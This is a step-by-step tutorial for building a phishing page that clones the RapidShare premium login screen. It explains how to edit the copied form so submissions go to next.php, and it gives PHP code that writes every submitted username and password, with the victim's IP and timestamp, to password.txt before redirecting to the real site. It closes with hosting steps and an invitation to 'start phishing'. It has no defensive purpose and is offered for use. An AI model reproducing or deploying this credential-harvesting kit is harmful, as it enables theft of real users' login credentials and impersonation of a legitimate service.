1. For this tut, we will use rapidshare.com as our page that we would like to make a phisher of.



2. Go to [url=https://www.rapidshare.com]RapidShare – Secure Data Logistics[/url] and navigate to the premium account log-in screen at the url : [url]https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi[/url]



3. We will now begin to make our phisher. Start by right clicking on the page and click view source.



4. Select all and paste into a notepad document.



5. You should see a bunch of random html coding, but we are only interested in two words: method and action.



6. Do a search in the document for the word "method" (without quotes).



7. Your result should be something like : method="post"



8. Change the word post to the word get.



9. Now do a search for the word "action" (without quotes). action is usually very close to method so you may not even have to do a search for it.



10. You should see something like this: action="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"



11. Where the url in between the quotes is, replace the text with next.php so the new part says: action="next.php"



12. Save this file as index.html and create a new document on notepad.



13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.



14. Copy and paste this code into the notepad document:



CODE

$datum = date('d-m-Y / H:i:s';

$ip = $_SERVER['REMOTE_ADDR'];

header("Location: Put your REDIRECT URL Here");

$handle = fopen("password.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "

");

}

fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)

");

fwrite($handle, "

");

fclose($handle);



setcookie ("user", "empty", time()+3600);

exit;

?>



15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:





CODE

$datum = date('d-m-Y / H:i:s';

$ip = $_SERVER['REMOTE_ADDR'];

header("Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi");

$handle = fopen("password.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "

");

}

fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)

");

fwrite($handle, "

");

fclose($handle);



setcookie ("user", "empty", time()+3600);

exit;

?>



16. Save this file as next.php and open up a new notepad document.



17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:

$handle = fopen("password.txt", "a");

I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.



18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.



19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.